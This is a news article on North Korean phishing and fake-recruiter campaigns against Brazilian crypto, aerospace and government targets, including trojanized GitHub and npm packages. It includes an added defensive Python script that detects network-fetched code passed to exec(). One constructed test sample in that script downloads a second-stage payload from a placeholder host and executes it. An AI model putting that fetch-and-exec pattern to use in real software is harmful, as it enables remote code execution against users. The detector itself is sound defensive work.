Cyber actors associated with North Korea have accounted for approximately one-third of all phishing attempts aimed at Brazil since 2020, reflecting the country’s growing influence and attracting the attention of espionage groups.
According to a recent report from Google’s Mandiant and Threat Analysis Group (TAG), state-backed North Korean actors have set their sights on various sectors within Brazil, including government institutions, aerospace, technology, and financial services.
Similar to their operations in other regions, North Korean groups have shown a particular interest in cryptocurrency and financial technology firms. At least three distinct groups have targeted Brazilian companies operating in these sectors.
One prominent group identified as UNC4899 (also known as Jade Sleet, PUKCHONG, and TraderTraitor) has been actively targeting cryptocurrency professionals with a Trojanized Python application embedded with malware.
Their strategy typically involves initiating contact through social media, sending benign PDF documents posing as job opportunities from reputable cryptocurrency firms. If the recipient shows interest, a follow-up PDF containing a skills assessment and instructions to download a GitHub project is sent.
The GitHub project, disguised as a tool for retrieving cryptocurrency prices, was modified to connect to a domain controlled by the attackers and download a second-stage payload only when specific conditions were met.
According to researchers at Mandiant and TAG, this tactic mirrors previous incidents involving UNC4899, notably the 2023 JumpCloud hack. In July 2023, GitHub reported a social engineering attack targeting employees in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors, encouraging them to execute code from a GitHub repository that depended on fake npm packages.
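A reviewer handed a "skills assessment" repository like the one described above can inspect it before running anything. The script below is an added example written for this article, not code from Mandiant, TAG, GitHub or any analysed project: it parses a Python source file into an AST, tracks variables that receive data from network calls, and flags any `exec()`, `eval()` or `compile()` call fed by that data, noting when the call sits under an `if` (the "specific conditions" gate). The two sample sources, the hostnames and the function names are constructed for the example.

```python
"""Static review helper: flag Python source in which data fetched over the
network reaches exec()/eval()/compile(), the shape of a staged downloader
hidden inside an otherwise benign-looking project.

Added example for this article; not code from Mandiant/TAG or from any
analysed repository. The sample sources below are constructed.
"""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Heuristic: attribute/function names that usually indicate a network fetch.
# ".get" over-approximates (dict.get also matches); tune for your code base.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post", "request", "recv"}
DYNAMIC_EXEC = {"exec", "eval", "compile"}


@dataclass
class Finding:
    line: int
    kind: str      # "network-to-exec" (high confidence) or "dynamic-exec"
    detail: str


def _call_name(node: ast.Call) -> str:
    """Return the bare name of the callee: f() -> 'f', a.b.f() -> 'f'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _contains_network_call(node: ast.AST) -> bool:
    return any(isinstance(n, ast.Call) and _call_name(n) in NETWORK_CALLS
               for n in ast.walk(node))


class _Scanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []
        self.tainted: set[str] = set()   # names assigned from network data
        self.if_depth = 0                # >0 while inside an if-block

    def visit_Assign(self, node: ast.Assign) -> None:
        # Taint a target if its value comes from a network call or from an
        # already-tainted name (one-hop propagation, e.g. code = resp.text).
        used = {n.id for n in ast.walk(node.value) if isinstance(n, ast.Name)}
        if _contains_network_call(node.value) or used & self.tainted:
            for target in node.targets:
                if isinstance(target, ast.Name):
                    self.tainted.add(target.id)
        self.generic_visit(node)

    def visit_If(self, node: ast.If) -> None:
        self.if_depth += 1
        self.generic_visit(node)
        self.if_depth -= 1

    def visit_Call(self, node: ast.Call) -> None:
        name = _call_name(node)
        if name in DYNAMIC_EXEC and node.args:
            arg = node.args[0]
            used = {n.id for n in ast.walk(arg) if isinstance(n, ast.Name)}
            kind = None
            if _contains_network_call(arg) or used & self.tainted:
                kind = "network-to-exec"
            elif not isinstance(arg, ast.Constant):
                kind = "dynamic-exec"
            if kind:
                detail = f"{name}() of non-literal input"
                if self.if_depth:
                    detail += " inside a conditional (possible trigger gate)"
                self.findings.append(Finding(node.lineno, kind, detail))
        self.generic_visit(node)


def scan_source(source: str) -> list[Finding]:
    """Scan one Python module's source text and return its findings."""
    scanner = _Scanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


# Constructed sample: a genuine price-fetching helper, nothing executed.
BENIGN_SAMPLE = '''
import json
from urllib.request import urlopen

def fetch_price(symbol):
    with urlopen(f"https://example.invalid/price/{symbol}") as r:
        return json.load(r)["price"]
'''

# Constructed sample: same cover story, plus a gated second-stage download.
SUSPICIOUS_SAMPLE = '''
import os
from urllib.request import urlopen

def fetch_price(symbol):
    return float(urlopen(f"https://example.invalid/price/{symbol}").read())

def _init():
    if os.name == "nt":
        blob = urlopen("https://staging.example.invalid/s2").read()
        exec(blob)
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        for f in scan_source(src) or [Finding(0, "clean", "no dynamic execution")]:
            print(f"{label}: line {f.line}: {f.kind}: {f.detail}")
```

The check is deliberately a coarse AST heuristic: it misses taint that crosses function boundaries or travels through files, and `.get` on a dict will raise a low-confidence hit. It is meant as a fast triage step before a repository from an unsolicited recruiter is opened in an isolated environment, not as a substitute for that isolation.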
Job-themed social engineering remains a hallmark of North Korean cyber groups. Google also detected a campaign by a group named PAEKTUSAN, posing as recruiters to distribute C++ downloader malware named AGAMEMNON via Microsoft Word attachments in phishing emails.
For instance, PAEKTUSAN created a fake HR account at a Brazilian aerospace company to send phishing emails to another Brazilian aerospace firm’s employees. These activities are consistent with a known operation referred to as Operation Dream Job.
In another campaign, PAEKTUSAN posed as recruiters from a major U.S. aerospace company, contacting professionals in Brazil and other regions through email and social media regarding potential job opportunities.
Google thwarted efforts by another North Korean group named PRONTO, which targeted diplomats with phishing emails related to denuclearization and news updates, tricking them into visiting credential-harvesting pages or disclosing login credentials under the guise of accessing a PDF document.
This revelation follows Microsoft’s disclosure of a previously unknown North Korean threat actor dubbed Moonstone Sleet, focusing on ransomware and espionage attacks against individuals and organizations in software, information technology, education, and defense sectors.
Moonstone Sleet gained attention for distributing malware through counterfeit npm packages on the npm registry, a tactic reminiscent of UNC4899’s approach. However, the specific packages linked to each group exhibit distinct coding styles and structures.
Checkmarx researchers Tzachi Zornstein and Yehuda Gelb noted that Jade Sleet's packages, observed in mid-2023, were designed in pairs, each published under a separate npm user account, to deliver their malicious functionality. In contrast, packages deployed from late 2023 to early 2024 adopted a single-package approach, were more complex, and targeted Linux systems.
Despite these differences, the overarching strategy exploits developers’ trust in open-source repositories, broadening the potential reach of malicious packages and increasing the likelihood of inadvertent installations.
This latest information underscores the evolving tactics employed by Moonstone Sleet, which initially relied on LinkedIn and freelancer platforms for distributing bogus npm packages.
The findings coincide with the discovery of a new social engineering campaign by the North Korean-linked Kimsuky group, posing as Reuters to target North Korean human rights activists with malware under the guise of an interview request, as reported by Genians.